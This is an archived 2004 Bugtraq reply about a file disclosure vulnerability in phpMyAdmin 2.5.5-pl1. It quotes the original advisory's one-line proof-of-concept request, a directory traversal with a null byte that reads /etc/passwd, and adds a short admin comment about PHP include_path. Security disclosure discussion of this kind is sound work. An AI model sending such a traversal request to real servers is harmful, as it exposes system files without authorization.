[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <20040205131240.GA8496@dns1.cyberlink.ch>
Date: Thu, 5 Feb 2004 14:12:42 +0100
From: Security Admin <security@...erlink.ch>
To: bugtraq@...urityfocus.com
Subject: Re: Arbitrary File Disclosure Vulnerability in phpMyAdmin 2.5.5-pl1 and prior
On Tue, Feb 03, 2004 at 11:28:57AM +0100, Cedric Cochin wrote:
> - -- HTTP Request --
>
> http://[target]/[phpMyAdmin_directory]/export.php?what=../../../../../../etc/passwd%00
>
> - -- HTTP Request --
That's what "php_value include_path" is for. Most Sites running
phpmyadmin probably have users which not only can manage their
databases, but also put up php-code as they like. And of course
they can upload things like that:
http://seegras.discordia.ch/Programs/phpdir
Cheers
Peter Keel
--
Operator in charge of Security Tel +41 1 287 2993
Cyberlink Internet Services AG Fax +41 1 287 2991
Richard Wagnerstrasse 6 admin@...erlink.ch
CH-8002 Zuerich http://www.cyberlink.ch
Powered by blists - more mailing lists